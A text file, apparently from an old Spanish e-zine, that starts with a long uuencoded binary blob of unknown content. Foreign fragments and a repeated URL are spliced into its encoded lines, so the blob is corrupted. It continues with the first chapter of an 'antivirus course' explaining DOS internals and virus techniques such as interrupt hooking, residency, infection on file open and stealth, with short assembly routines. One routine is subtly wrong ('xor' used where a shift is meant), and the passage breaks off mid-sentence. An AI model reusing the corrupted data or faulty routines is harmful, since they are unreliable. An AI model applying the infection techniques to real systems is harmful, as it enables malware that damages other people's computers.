M6COS,UBPJ]I$KRYP0>>9[39:OY1ZN[K8&(C(M;<(@(%=S97X>(!65!0>E8TJ`BLC$UQS;E.I,]=4A=6P^978UH;*_[KR[>OS[3)Z\_G'SL
MZQ_/>Q_TU:N>/G]S\K*GG_=>7%SV=+_W]NS\[4M]_E:?GO1[7'>I3E]=G)_V
M],4+_>[D\N1-[ZIWV=>O3OKZW>7%V?O3WIE^_[;WMW>]TRM\/+F\.G]Q[]E;+;?.O^=.]V6(4@'$(IICZ0H"*7>%789%?A:)?IF")`2$.4
M@8jumi"<82)&/C0B=*2QBE0\NJ=13Q05Y61JR5.#2M)3W^0(AD.YMQ?S\TTE
M>T59WS4A]B-0\E(E36S'Q<8Q)=V0U:;];[;\W>V`/UC?H-6JO@%7S5RZ<3$>
M,>C`MQ:V15$ELKXALMP>*M9O5.Q%>9C#K2KHDXP*ME0T\N;ZNNOJCLZCJN_@
M*06C[N/5NYJ!NU#BH+_^6FZHTGV1R=YQG=>JTUT?I>6T?)BV-V,4HKXT4'*1
M8,.^V\^C:C1.?#8>1GE1-AA9[6(JMX6DD,P:7.5$MS1WPJ^$,$ZM8IS%8N7/
M=;57LUXL^=.MWV38M](!5J3XDKK%E[4L=)&VUSD6RX']:NZSYD2E4$*M37WR
M6Y-/G)P\,\M(5WHF;C;#@Y-2)/;1>RGV`MQ8MJ4ND>$H(7O)-5;8#\A6UV]3
MZ\/>Q-;%O"VN7$E7(;QM359%B[':9@)R8UK*7JKDDJFAU$"PH!/M/0KQMZ[&
M3E7HP_0:/8VZC0!F.[=N^2]:;4C;H:E(::RL%,AJ]<3_F?)X8'P'RV6&81#%
MLUR>\!T)%K[*YFBN;67[IJ)O5K`CPWH%L%CXUS(:%/CB25U7*^D)@>^S\_[5
MY?GS]U?G%V_UVXNK7O^.JW^(9SFJ0FCU2I3S/!@$Q:I\A>[DWU`A^$Y1*BA)
M\<6T@;YRA4(3F:P0V_UO]_:OU/XV\/@O*/?,?PR^]_:KW7
M.?#O?QXX:_
M5/`SU@DP8'!4+GNJZ>G@[P\JZOAR_(WZ1GW-__]M^3].J3WY@VWL]_S_H/MH
MQ?_W'^_O?_7_/^-/?1>%O#C65Y?O>^H[=X7,+QO=ZNN+D]?]WD9'?4=?0NI9
M+C*#H8U94J!J@$L-)T&^P=K@N!J#J>;EQ@;2C>YA]53':3*6AX_VZH<5&;MF
MCC!VQZ`LC>T@N>8@;WP]D[YEM&&;'-7SP@T4VQORjumi\J01P97L2OTXGY:?_H
M"Z0PV"#V'^G_P.)_N_]WNX_7_+_;_>K_??9=OG;V&KKT].>]?/SZ\V>/M>
M#9U>O+ZX?'/RSHT<=50U].;D;]>G%V>]_L9^Y_M#I;[Z_W^>_[M,[X^SL2_[
M?[>[W]U;S?\?'W[]_=>?\J<>[BB]4R7\[(.TA_H'O76ZK4_3;)'+6Z?=[[_?
MUTMUNI9E2ST#5J;5BN9D66Y-EI>6=W<^2,[_DJK%WWNE.PTN"C*8,$\OPR&$Y;FMA>MTX%9B%?D)C8WO'!V?1/>
M[$C;A&2@"W`WM)V3JFTP,FW]-M7S((=#E0M*GN%)KRS+C)>\@VB."H7
M),6WI(//6
M1U2VW&]_Z/3VI@IUCE1.(#?+>"N+?>7.E61F276=->9/BN9RE;0K+8+CX+?_6K[KV]NOQXK!J!Z_Q*8M!U__R_
M>UI_7XT\/SF3`9]GR"ME=5A[<7[9OVI,P'`8AG74>]T[N6P,[QT<5F.]BQ=+
ME/<.'E=C0/M7CA4+=-A2P1#+:*@E4>9#^ALOJ7_ZI)_J>R_/7QP]#NX=5]-$
M1J>$:WG7\*PW5L9.K[PCN!Y$Y35L
MF*^#/]6=]4E1\GO#TFI:&O3G-@UNK\G>W:-<=XTI&#WH[JV/3X)B\E.E4/#O
M9\@O+.2G.M?V-G/Q&^;H28-=1;6WBXO;4B]\.C
M[98.MV4:?U01/>T=7BVC0D<7-7W_:?Z
MZ%C]NBR7E4C4MC5L43"OC^'Q73**F5G*"RI[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt],-9_`%95U(;[AQ`Q'Y\N2I
M7M7$_:/MFL^:&I:M*Z,I[.J"!P\^_?)TB]O^NR]VB7RS7LZUM1)V1JV=O+4S;NT,
MCI6/+3N>\`H(MNCXS9#1"*_#6I4&_><3Q5&H(?>QKRAJP::MV;
M#^Y16R8N3&,:#ME>E'M:W_H1ZR=AEH.O<`N33)ZW[IWRI=K2WK[)^OO%_R3W
M*H5Q!W?PS@^F9@I7WJ+5M'2G)7$E#>7[-F>[<8\HS3G^V?:="")12VT\W-$?
MY'>AFSA.V!,3PV0L-S)RY4L>F15MA/;GHUL^OK?T84MW6[J2=XF:>RG.KJQ,
M=(O_W[8FTURX-L7_!&MI#NUTBT7Z@\[MX\Z#H]WNG1-^_V$##"RN5;!F9^<2
M\YI4W,#XMP8&:P._JIKCO=/?DG:5V=\?^'^I\(LZ6@:XW3N.]I4]5.2"T?^U
M=ZU-;219]G/I5Q2TS52A$D;RBT"(&+>[/4M$C^UPV],;01,*(0DD6P]"@@:Q
M9G_[WF>^JDK(GNGV1EA\`*1\OV[>/'GRWCD>.FAT=?^($]G9=(.'@Y81W$%>
MLB9;[H:!"UAE+4N5;6Y"2FL[F+9P6,#QPA5GPPY486
M:3K6N17F(,L)E)B%LUC"'5
MTM`HEWG%^[I:;=IZZY>'JNS8&NLWVZU&TYTD^+W)XRZ?57R(ZQXE5V(.A'!L
M;Z0V:W.;2T%X"]L]5W,B\,L_@,5*W(N6#:EO'#5
M"_TY5Z#+TXG#._1Y*8J$MNPMCW\,9'EW-)WWW>1WE>^3_V\NZO]$C'$Y_MMH
M/'W^S,%_'R/^^^S9TS7^^U?\,/S[#_L8M6I8\??,W:,.AR"!,P9/L08WD)'
M44.)%=R%"<&&GN8T5-CX:G_W9CHJP*LV]M.$W[6G5R._"22K;G.?[1-S'6V(8&U
M9@Q[[ADMP=,QSB,:B9WXU_ZEO.O#R80MIE<]?32=Q81)IG^JJ12U)E"3)Z+R
M>`BM;N!KT1WN'0/FN]!Y'.^Y@/V;#^^]T/INXTG%!K7!:F
MQ:)F!"K@1_P/4LP_%<2^,JI&9L4ZM',MH^+N$'(R,AJ>.*%X'AU)1@49JPF+B-B:'$
M+-8K9]P`R<80(_,7TWG8'(-XVB3-"NW=-`QNTASLR=UKON%9`;+U4WO4GYPC
MGAII3A^Q$SX27NEGJ5A*+K'?H0Z`WHTW"/..M[;B87Q04*R]*(BZ038,+D@.
M`I>8AA]_K%9/Y"+'.XOE*W<8[V+Y;EV2CU"91`5M#>\U4P?\E-G?^?1
M[VR("[TF>=-YU$P!6SV>&\[H(WA-@]_A`Q^,O(V]TD#C@+JW68TGSI@5W'PY
M$S^&F1_Q/C=GBK\^>/K4[U^0NC"`37XA.-V*]UXE-TF)Z<+:GAS)O:LB[W[%
M1H91"#-+O=EAAYYN7YS/N;NQX8G.BLA?<'%NQ278@^F0(9XPHQ;*LR@\AC]L
M4?,9Q#?UIPDJHD,$*=4`NIVL):$RA@]GU:@0G8C[J#:C'H56(,B4'.A3=;8@
MT,@J{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}K?*];G2'4#;8&>NZ`6R#JGFAN$W,46U1%KL928-%RT$C0@XM,0C\TT
MQB0$EW3A";2FBM!>:0P0BO43EH\Z&3Q=`%&:/;D"1`E[3UZ-DU0O_!I/,#I-
M]13J6<4;)_G42+'$^C/&S?6*I2"1WLG!UX>'^1O>^"%5._)4"JXDI=G2K#PE
MHPR3\=KM[""\(;,(><-7JAVQ-4EV&G&?0.W9-](%VRE9B0@EB%ZKZ=6X`--_
M=@/E1BP">6%#GE`Z9,FP0ZI)/-P-F*->-N>5";7U[YX89BD<_5*UF,NQD=
MPU!<()VY$!.U)S6`O:@^M+2D!*\=.&/"AD$/X/#]KXZ37K&4A<92NE&D/G^.
M$XP,NP65B=N%*F00IG5*;36=%C*67=QD!WZEGD;J0=UL=%PS4Z]*I-$^4RR-
MIMH:U&I#]3+%/^*V6[4P"6=NFV%Q=^%NI
MK0++B{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}..C/,J)N&2#S'T7QJ-4&_PYFGW:*?&(MUI('?^;P&*SI]9+K)>%*3
ML:(ZOB`J]-3##9&`%I6U<%+=R;I^B[>VL*ROYF0;@I_5T++5]_S\Q+T5IX>@%>@J
MT,^O/_SR2]/FMDUWCF1KV(1YQSJ&QPU+BH]KTU$O^&8X<8A45JW(1-WN]U@J
MRF'"U&W0F;?)-MBXWB2;<(H;^JMA7.0,P+C3H5&<>J.
M26S/<#S?[TUZ:I+2Q2@N:)HIL#'5S3V*SER1&3>@/B3UU*RZR#E:)DD==^;.
MY73(I51!"8.,MN#0^>J55>"D"HJA@RL&7`L:I^->8F\:?]X]/H%(A81*"KT98(5
MF4P3RB?-3!2CPAF)37U0D`P*]M-!]15LBSPHH%F1-F&^CO;72FA9;J<,[NDI
M+$U;+90,Q6R8U]-+!2CE[;J9!<[`W&DK3'^G=/I0<<4[(4RE<>D
MSC9GS.7A7&U4F2(%G)V_"66'V3JV'GRU[\RA.V%^D.:9>.(V>Y;5,ZBCD[OWO0Q_('QA
MM6UYKVDP\YQ$I5C/DAD>I)8!8U?A*ZYPQEN).JQOG81G1+F]?-M8ZOWTTC
M_#/M1.5_-/&+W(X?6S"$(A$$,C%,PB6UN5NQKE\P2I$J-CQ61<%B7KLPO.)J
MGUA[F6B;1VH"_6$OOL%?O`/C["]"D$U6V*[8+0,&W'M_E>:G<[Q)#BO$#C-;
M*L.9C7;MIS.\C*G%O:M3,J(C'%:9Z4;EXX&@B>D!JT6LMQ%$K#B'1)%L!2/B
MP]IFCGHI-9["W7$K0,-YLD<>4"V1+)"=2U4E4-,KB785#XF/\]&HU?<7CD81X`KAF)FC
M4SBU@NL3C>*-T\%!;I0D6OFLL7&\P2P:=#.HT9<.14''Z?FN0,?WNJAI%"")
M[*C^?D2.X6KO?E]O!:I\LV#036I'F1-]8%EM[>$CJ)+I*[\JARW_TLET4TG^
MVN:FC67G9C"[D?YOV]&T1^YP%1R:&T/+C@J5A#?3BWF$>=2.(IVX=C*X-X%
M'>"V[#`8#E,)6>RK-#0VS#/GHBTLB?EU32?+H(=7RD-N_KZH-PM[1@EDW2?CQ1[$PFC"<[PV:JV(Q+Y&9<)#CI2.1GU&+%*.QS
MLR+,8X]@*I?'E^<:N>52(#-DN5KXJEKUA:2L3XJ'S3#08F8N>56WQ?HENXQ???OSO_I+
M^#,Y9O%R^P_UQXW'(?_O:7UM_^4O^?FA\@/?T1G'&2@9_^G[JK#T0"8'GBX\
MCMY.!7-!QV;L)B-3GR"Q6A=3UR:^0X^_C5UW'I!%@4,/4R\LI/(&<5ATH&)-
M2#FFI>#`\LM/Y&(%MKR7;]_ROQ6JW0VUIU=Z4
MY80]AJ9*QV@WCM,C.2\AH@0([2NQ8$Q.C_#&&UIB,HUK:C3+9N_XC/%+^?5?
M[YYX5;*IQ9^,'T;?5%Z^;'6[%?2LN1]%KNDZ"[V[#@[VHP<)=S3L?@^2ER_3
M&'Y3KOB?!,6UJ9O5@T2Z/G6M1>Y'RB^>YK,R09B5`/PABG?;9HC[;
MHO[P:WST_L6[V'$I+,9,'5NF&3K81'KT).Y-KTXO,TM@QIA#])OEN*Z`%7]Y
MB9<(5Q=#\E'`C&`V-0C9#/JP*UEGOG/>%WJXP$F,^^G%/X6X:IM,KW>VK4[S_4W1NPXO^[=W1^Y_;;]_]_.KHOU&B[@8A/[UX_T)4[2#DUP^O
M)$TC3WV]S@9YQNR,#(EDY_SG-#`K8M^EHQ0H9NW"JIZ214YSV?O%O%[B1"S-
MXNQJ-&JKTZS26&S.2^XQ2^+A8Q^@"ZSH>(!]BC#<."_W498Kjumi)@1)I/?+W^_5#[%V86P*B;X=X:_
M^L*G@&1!0E1#]W.98?F7UL>E<0::F7YO/IQNQ0D@QA!S[#7.>:^92GL5L#WXFH.FM,U%?0\X*B)W,W@PF[KR+/
M>V=FUT/G+GCT05>AY"H!?764=@JZMR4?[SA=C;>W*^ONS?4?6&_L%33JHL!Q
MZL0X&Q7G2T%'Y;.9L52T#IGRSJWSB?K4H;2<73XXW3+;LMFZ-;_\.D+_Q?1_
MP3SU/9'*%18)8NMG02^T^.JVP4IT\(9=UQQJ!=!BW#9O,OBUR"8WV621S6ZR
M&?[?@`^.R2&-WKO.>H.L=S//>HMY_LT'#&6&?*ILC+]&Q*D*"8-06([O+P$N
MG2L,'0W'!0\GBNAT.9$Z/4-(C/;S7"1+DN^?NC>>JE<<6NY$QZ%TJ[F;
MXE@"@%T=I)3F")_4",LY:"W]F0`ZID6W>+[@V6BA_U4B&'J\
MK5XT3""!P;Q(:CI0GB7)K_*!;S'1LN'[Q5FRHGMKS'M%S'#`]<7!+B)W_8X#Y/+/3
MG#^H6O:E;#7M/=M.29ET>:*ZHS>^DSTX<3`/F"7.QFTLM(7
MWX5XQ@B]1I%4HYBXB:/C8XS%O"/6'#LI'?#1VY+&0U1J3V^+Q+\[>8V"M!K'
MNK%#C]'BL=YX7W_U5N.-.ZBE3OZ8COY@'QV.>[++P518H2QSH#CCH&[(1X9!
M?T3"'P$RC8E.]>CQ(0AS?%S'CNHG"VOS7V.*>[89FBI)D)%_/F`G;+`1T=$'
MSPT2%[S(B3L?.%EG+W2L:<%57W
M6M5`''GV[9)"78JM<^=0<::D!&'6CGX("\:KESL9M61>>F,A9XL\P-ILD>J8
M"A781HL_QW:%:M7M%8JB.59R\Z7+ZI3?L4LQ]Z3NR(\@K'WZ9$EM7T.BM<34
MG/174^/&VHQ#A+>;JI/JGJT[*MFSH]Q&'!7OP)&W]4:KL?8+-]NH;)=5:SBF
M`M`@%/2F[^1NT><':^RN4^ZVY18;PFUDWQX0?_(G45])@Z:UB>9NGCVAMSS(
M?GJRMSL*XKH6+?@-U`W24LBM[E/LY(7_JW32R]-S#_4Y8O!_WN)YP<5XRA
M<`U[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]C#N-()&+F,'#S9YN;A$U.*8?8-G.B=+(TYX#5;K*2Y92TDN(`+0."C0
MROJF!5L+1PFS9U)K-T>FH$"](RVN^*8ECY1E[XBZHH@.G785Z'?(:C8UKM1O[J".?PXXO;1?>()U+J=G6CF%M!=!0+5N
M@JZ#D(8)&00AC_5&'EK98B+B*KTSO[VG=QK+>P?/YL6]$;9?FC(*6C_PO[9M
M'YKG*?67XD9;VCQV.!K/%'MH@HU
MH/\NG9LK[]^"_$D=("&T#B^8BZC;7NGV%Y_)`\'46`\:IECX37O5LXW`]FS
MCL[0L@6IO(+#R,Q%U[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]H#>NE-",T,2,TLK>%9ZH-=^J3FC4<0P=-@K4S\:3*]MKKK$,V4B(>WFGHZPZ,).1E$H.AJ=C%%^RA#?O3:F_8IB5HI
M&3K>.T_[ZJ<6X6STX8J^E6;HO)Y.`I0!Q!NPLS>\X6#/M'@XN!2(K.<[DD7`
M!YT&3F>4VOAU1A^;PU%GMA-S1ZGG!/2)ENRF53BR70PAAY1].?AJ(73$"W'=
MQ^<4QZ!`),BR_Y`"YMCVP#[DP#B%;P)B>::@G@&1L\U8&4ZOC#/)33%U6(%C^`[$\O;U28B?2$$W4M`-%'2-?TUW0.Y8$IM9M,A3Y&)/
M40'Z%-V+/Q4B4,48U*HHE(M#N4B4@T69@[&/1QG8"1>.`E+.,U8O])8+*$>E
MHOMQ*>QS^![&RNR6Q0!5*4158/2R`*@J@:J*P*HRN*H$D8KN!;*4,UL&I"Q'
M->['3*(E>(LINQQ2N:_X$%:Q'.!*Q>M"$^$KX)4\P%(*L2P%64*8Q7*Y<(
MMCB#O'BT&7*-KN5:NQO+2.(A^%,<_>V&XLZ]?%+]?X7=$`G:S2Q1;*AX<]
M9AHENF6ERC6R-<[LOX_V1NZK0',TQK?SSDPH+O^W%^]>HVO#_?CH]=L/[V.Z
M0(96OG[Y`OT6J2J&F8>&SK-!!KM$ACV>.8=5L7%NK`>7),.3;V&RK^ZUD>FV
MT?^C?A,]XDY]X'Z[\_^WYA^M?]8_ZY]O][/F_W_?/VO^_YK_O^;_K_G_:_[_
8]_FSYO^O^?]K_O_WR___/Q&@"8``L```
`
end
sum -r/size 1846/11634

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

 CURSO DE ANTIVIRUS
 ------------------

 Primer capitulo: INTRODUCCION

 
******************************************************************************
  Disposicion Legal:

   El motivo del presente curso es instruir a aquel que lo siga en el
  conocimiento de las tecnicas usadas para combatir virus, empezando por
  las mas basicas para acabar en las ultimas novedades. Para ello
  profundizare en el conocimiento del codigo virico con el unico
  proposito de poner al lector en disposicion de saber a que nos
  enfrentamos cuando luchamos contra esta lacra del mundo informatico.
  La informacion contenida en el curso es informacion tecnica que puede
  utilizarse en la fabricacion de un virus. De ahi que la responsabilidad
  unica es del lector, y a su eleccion queda usar bien o mal la informacion
  aqui relatada. Del mismo modo es su responsabilidad ejecutar cualquier
  codigo aparecido en el curso en su propio ordenador o en el de
  terceros, declinando yo toda responsabilidad por los posibles da�os
  causados.

   Para evitar en la medida de lo posible el uso fraudulento de esta
  informacion no dare en ningun momento el codigo completo de ningun
  virus, sino solo rutinas sueltas. De ese modo la confeccion de un
  virus a partir de las rutina mostradas en el curso es una labor que
  requiere un esfuerzo por parte del lector y por tanto un delito
  consciente.

>   De ahi que yo, el autor, declino toda responsabilidad civil y/o legal
>  que discurra de la utilizacion fraudulenta de esta informacion. El
>  responsable unico y ultimo ser  el lector si decide usarla para dichos
>  fines.
							El autor:
							Manuel Llorens.
 
******************************************************************************

  He creido conveniente comenzar el curso explicando cada una de las
 preguntas de la encuesta, dada la variedad de respuestas que he
 recibido. No me extender� en aquellas que por su caracter meramente
 tecnico pertenezcan mas al curso de ASM de Pablo Barron que al
 presente.
  Cada uno de los puntos se desarrollar  a lo largo del curso alli donde
 sea conveniente. Aun no he decidido el 'indice' del mismo, que ya
 incluire en el proximo numero (es por esperar a tener el mayor numero
 posible de encuestas)

> �Sabes para lo que sirve una interrupcion?
  Una interrupcion es el modo que tiene un programa ensamblador de
 ejecutar servicios y funciones del BIOS (Basic Input Output System,
 mas conocido como la ROM) y el DOS.
  La mayoria de los virus 'interceptan' estas interrupciones de modo
 que cada vez que se ejecuta uno de dichos servicios el virus supervisa
 lo que esta haciendo el programa que ejecuto la interrupcion, a este
 proceso se le denomina 'instalar un gestor de interrupcion'.
  La instruccion ensamblador que ejecuta una interrupcion es

   int numero_de_la_interrupcion.

  La direccion de cada gestor de interrupcion (vector de interrupcion)
 se guarda en una tabla a partir de la direccion 0000:0000, y cada
 vector ocupa 4 bytes (seg:off).

> �Sabes instalar un gestor de interrupcion?
  Pues tan facil como esto:

  mov  ah,25h (servicio establecer vector de interrupcion)
  mov  al,interrupcion_a_capturar (entre 0 y 255)
  lds  dx,gestor_de_interrupcion (direccion de la rutina gestora)
  int  21h (llama a la interrupcion del DOS)

  Otro metodo que puede usarse si no se quiere llamar al DOS es el
 siguiente:

  xor  ax,ax
  mov  ds,ax
  mov  bx,4*interrupcion_a_capturar
  mov  [bx],offset gestor_de_interrupcion
  mov  [bx+2],cs (si el gestor esta en el mismo segmento que el actual)

  Generalmente es necesario guardar previamente el gestor de
 interrupcion actual antes de cambiarlo por el nuestro con el fin de
 volver a instalar en antiguo al salir del programa. Tambien
 generalmente es necesario que nuestro propio gestor de interrupcion
 llame al antiguo. Por ejemplo un virus captura la interrupcion 21h (la
 del DOS) si 'detecta' que el programa que la ejecuto est  intentando
 abrir un fichero (mediante ah=3Dh) lo tratar  de infectar y finalmente
 dejar  que el DOS lo abra, llamando al gestor de interrupcion antiguo.
 Igualmente si la funcion que el programa ejecuta no es util a nuestro
 virus la dejara pasar al DOS 'intacta'.

> �Conoces la forma en la que arranca el DOS?
  El proceso difiere ligeramente segun se arranque desde el HD o desde
 un disquete, pero basicamente a grandes rasgos es el que sigue:

  Primero se ejecuta una rutina que reside en el MBR (ver mas abajo) que
 se encarga de cargar el sector BOOT de la particion activa. Si se esta
 arrancando desde un disquete el proceso es similar solo que no existe
 MBR ni tabla de particion, ya que el sector BOOT siempre esta en la
 misma posicion (el primero del disco). Se ejecuta el codigo contenido
 en el BOOT. El BOOT carga IO.SYS e MSDOS.SYS a partir de 0070:0000 o
 presenta un mensaje de error si el disco no era de arranque. A
 continuacion ejecuta IO.SYS (una rutina contenida en el que se denomina
 SYSINIT) el cual ejecuta a su vez MSDOS.SYS. Cuando MSDOS.SYS devuelve
 el control a SYSINIT este carga el CONFIG.SYS lo procesa y al final
 entrega el control a COMMAND.COM para que cargue el autoexec.bat

  Este proceso de carga es muy importante dado que si un virus consigue
 infectar el MBR o el BOOT toma el control del ordenador antes que
 ningun otro programa. A partir de aqui tendremos en cuenta la
 siguiente maxima del mundo de los virus:

 "Toda porcion de codigo ejecutable es susceptible de ser infectada"
 "Toda porcion de codigo no ejecutable puede ser infectada pero nunca
 puede dar lugar por si sola a una infeccion" (por ejemplo un mensaje
 nunca puede dar lugar a una infeccion, aunque si puede haber sido
 infectado por un virus como modo de guardar en el sus datos).

> �Sabes lo que es el DTA?
  Es el Disk Transfer Address. Basicamente es una zona de memoria que se
 crea al ejecutar cada programa y que sirve para que las funciones del
 DOS devuelvan informacion al programa a traves de aquellas
 interrupciones que no piden explicitamente una direccion de memoria.
  Por ejemplo, cuando leemos un fichero en ASM mediante una interrupcion
 le pasamos al DOS la direccion de memoria donde queremos que este meta
 los datos leidos del fichero, pero cuando le pedimos que nos diga que
 ficheros encuentra que coincidan con '*.COM' la respuesta es enviada
 al DTA, ya que no le pasamos un direccion.
  Por defecto se encuentra a partir del byte 80h del comienzo del
 segmento del programa (ver diferencias entre un COM y un EXE) y es la
 misma zona que usa el DOS para pasar los parametros de la linea de
 comandos a un programa por lo que si vamos a usar la DTA deberemos
 relocalizarla primero fuera de dicha zona o perderemos la informacion
 sobre dichos parametros. Relocalizarla es tal facil como hacer:

  mov   ah,1ah
  lds   dx,direccion_del_nuevo_dta
  int   21h

  Lo normal es que el virus se cree su propio DTA para no interferir
 con los parametros que se le hayan podido pasar al programa infectado
 y luego restaura la DTA antes de salir.

> �Sabes lo que es un MCB?
  Memory Control Block. Es una zona de memoria que se encuentra justo
 antes de cada bloque de memoria que reserva el DOS para uso de un
 programa que indica cu nta memoria se ha reservado, por que programa y
 cual es el siguiente bloque. De este modo un virus puede reservar
 memoria para si mismo mediante la modificacion directa de estos MCBs.

> �Sabes lo que es el MBR?
  Es el Master Boot Record. Esta presente en el sector 0 de cada disco
 duro, y contiene ademas de una porcion de codigo ejecutable la tabla de
 particion. Puede crearse un MBR nuevo mediante la ejecucion de FDISK
 /MBR, en caso de sospecharse que este pueda haber sido infectado.
 Algunos discos duros de gran capacidad (>512 megas) instalan en el MBR
 su propia rutina para poder enga�ar al DOS y hacerle creer que son
 menores de lo que realmente son, ya que el DOS no puede trabajar con
 discos de tama�os >512 megas, de ahi que debemos ser cuidadosos. En
 cualquier caso, la destruccion del codigo ejecutable del MBR no es
 demasiado peligrosa, ya que siempre podemos restaurarlo mediante el
 FDISK o mediante las utilidades que nos entregaron con el HD, pero si
 es m s peligroso destruir la tabla de particiones, ya que si no
 recordamos los valores que contiene podriamos perder el acceso al disco
 duro.

> �Sabes lo que es un CRC?
  Ciclyc Redundant Check. Es una forma de comprobar de forma univoca que
 el contenido de un archivo no ha cambiado, mediante una operacion
 matem tica que afecta a cada byte del archivo y genera un numero (de
 generalmente 16 o 32 bytes) para cada archivo. Una vez obtenido este
 numero las posibilidades de que una modificacion del archivo de el
 mismo numero son peque�isimas. De ahi que haya sido un metodo
 tradicionalmente muy utilizado por los antivirus para comprobar si el
 programa habia sido modificado por un virus, guardando para cada
 directorio un archivo con los CRCs de cada archivo del mismo y
 comprobandolo periodicamente o al ejecutar cada archivo (en caso de un
 antivirus residente o uno que modifique directamente el ejecutable para
 que se auto chequee cada vez que se ejecute, lo cual ya no se usa porque
 daba muchos problemas y falsas alarmas). Otro metodo de comprobar la
 integridad de un archivo son los checksums o sumas de control que son
 mucho mas sencillas y rapidas pero de menos fiabilidad. De hecho el
 metodo de los CRCs es tan potente que muchos antivirus son capaces de
 reconstruir el archivo antes de ser modificado a partir de la
 informacion de estos. Esta tecnica a dejado de ser segura debido a la
 aparicion de virus stealth (invisibles) que son capaces de hacer que
 un archivo infectado aparezca a los ojos del programa que calcula el
 CRC como estaba antes de infectarlo (ver m s adelante).

> �Sabes en que se diferencia un COM de un EXE?
  La diferencia principal es que un COM solo puede ocupar un segmento 64
 K y un EXE puede ocupar toda la memoria por debajo de 1 mega (sin
 contar que el programa este hecho en modo protegido). Pero para
 nuestros fines la diferencia principal radica en la forma diferente que
 tiene el DOS de cargar y ejecutar estos programas. Veamos como carga el
 DOS un COM o un EXE.
  Primero se crea un PSP (Program Segment Prefix) que ocupa los 100h
 primeros bytes del segmento que ocupa el programa. El programa en si se
 carga a partir de 100h. El PSP guarda alguna informacion sobre el
 programa que se encuentra justo despu�s de el. Ademas como vimos
 contiene a la DTA y/o a los par metros (por defecto). Si se trata de un
 archivo COM el programa comienza a ejecutarse a partir de 100h, si se
 trata de un EXE el programa se ejecuta a partir de los datos
 especificados en la cabecera del mismos que son los primeros bytes del
 archivo ejecutable. No debe confundirse el PSP con la cabecera de un
 EXE. La cabecera de un EXE son los primeros bytes del archivo y el PSP
 se crea para cualquier programa ejecutable en la memoria (COMs o EXEs).
 En realidad existen otros programas ejecutables como son los
 controladores de dispositivos (Device Drivers) que se instalan en el
 config.sys o los cero code start, que son archivos que se ejecutan
 antes de que se haya cargado el dos (IO.SYS y MSDOS.SYS por ejemplo).
 En un COM por tanto el primer byte del archivo corresponde con el
 primer byte que se ejecutar , en un EXE en cambio los primeros bytes
 corresponden a una cabecera que principalmente ofrece informacion sobre
 el punto de entrada al archivo, es decir, sobre el byte a partir del
 cual se ejecutara dicho ejecutable. Ademas contiene la tabla de
 relocalizacion que sirve para cambiar los saltos absolutos (los no
 relativos) que contiene el EXE de modo que este pueda ejecutarse
 independientemente de la direccion de memoria donde resida (para la
 distincion entre saltos absolutos y relativos consultar el curse de ASM
 de Pablo ;)

> �Sabes hacer un programa residente?
  Un programa residente TSR (Terminate and Stay Resident) es un programa
 que al terminar su ejecucion no libera la memoria que le habia sido
 asignada por el DOS, pero si devuelve el control a este. Sirven
 generalmente para instalar rutinas en memoria, en la mayor parte de los
 casos gestores de interrupcion. Para dejar un programa residente hay
 dos metodos, el primero es mediante la modificacion de los MCBs y el
 segundo mediante una llamada al DOS:

  mov    ah,31h
  mov    al,error_level
  mov    dx,tama�o_de_la_porcion_residente a partir del PSP)
  xor    dx,4 (para pasar dx a p rrafos)
  add    dx,16 (para reservar espacio para los 100h bytes del PSP)
  int    21h

  Para conocer el tama�o de la porcion residente lo mas conveniente es
 poner una etiqueta donde comienza y otra donde acaba y hacer la resta
 de ambas.

> �Sabes programar un tracer (paso a paso)?
  Un tracer es un rutina que pone la CPU en modo paso a paso es decir,
 que cada vez ejecute una instruccion llamara a la int 1h. Existen
 diversas tecnicas usadas por los virus y otros programas para evitar
 que un tracer explore su codigo (armouring). Para evitar esto ultimo
 hay que programar con mucho cuidado de modo que cada vez que se ejecuta
 una instruccion miremos a la siguiente para ver si se trata de una
 instruccion capciosa aunque es un proceso laborioso y dificil...
 en general el procedimiento consiste en instalar un gestor de la
 interrupcion 1 y activar el flag de paso a paso:

  pushf
  pop    ax
  or     ax,100h
  push   ax
  popf

  Un tracer es muy util cuando queremos supervisar la ejecucion de un
 programa de forma autom tica. Los virus usan esta t�cnica para labores
 de tunneling (ver m s adelante).

> �Sabes usar algun debugger?
  Un debugger es como un tracer pero con control en tiempo real por
 parte del usuario. Es muy recomendable tener uno a mano para pillar los
 bugs que derivan de la programacion de antivirus ;)

> �Sabes la diferencia entre un virus y un troyano?
  Un virus es una porcion de codigo ejecutable que se a�ade a otra ya
 existente. Los virus se ejecutan sin intencion por parte del usuario,
 que no sabe que el programa en cuestion contiene un virus. Un troyano
 es un programa con entidad propia que generalmente se construye para
 labores destructivas. Es el usuario el que confiando en el programa lo
 ejecuta creyendo que se trata de un programa de algun otro tipo.

> �Sabes como se produce la infeccion de un archivo?
  El virus modifica el programa a infectar de tal modo que se ejecute su
 codigo en vez del codigo del programa original. Salvo los virus de
 enlace todos los virus necesitan modificar el programa original.

> �Sabes lo que es un virus 'stealth'?
  Es un virus que mediante algunas t�cnicas consigue ocultar su
 existencia a los antivirus y en general al DOS. Para ello necesita
 estar residente antes que los antivirus. Modifica la informacion que
 los antivirus obtiene de modo que parezca que el archivo es normal.
 Para ello existen diversos m�todos, ya que son diversos los m�todos que
 el DOS usa para manejar archivos. Principalmente son el trabajo fisico
 con el disco (a base de leer sectores), los FCBs (m�todo obsoleto), y
 la apertura del archivo mediante handles (m�todo vigente).

>       �Sabes lo que es un 'handle stealth'?
  Es un virus que utiliza t�cnicas stealth de modo que cada vez que un
 programa abre un handle para leer/escribir un archivo, modifica los
 datos del handle para que parezca que el programa es normal. Es decir,
 aunque el programa sigue estando infectado no es posible ver el
 verdadero programa sino solo la copia sin infectar que nos muestra el
 virus.
>       �Sabes lo que es un 'infector/disinfector'?
  Es justo la t�cnica contraria, cuando el virus advierte que se est 
 abriendo un programa infectado lo desinfecta y solo vuelva a infectarlo
 cuando el archivo es cerrado. Es un m�todo m s sencillo de implementar
 que el 'handle stealth'.

> �Sabes lo que es un virus con 'tunneling?
  Cuando un antivirus queda residente instala sus propios gestores de
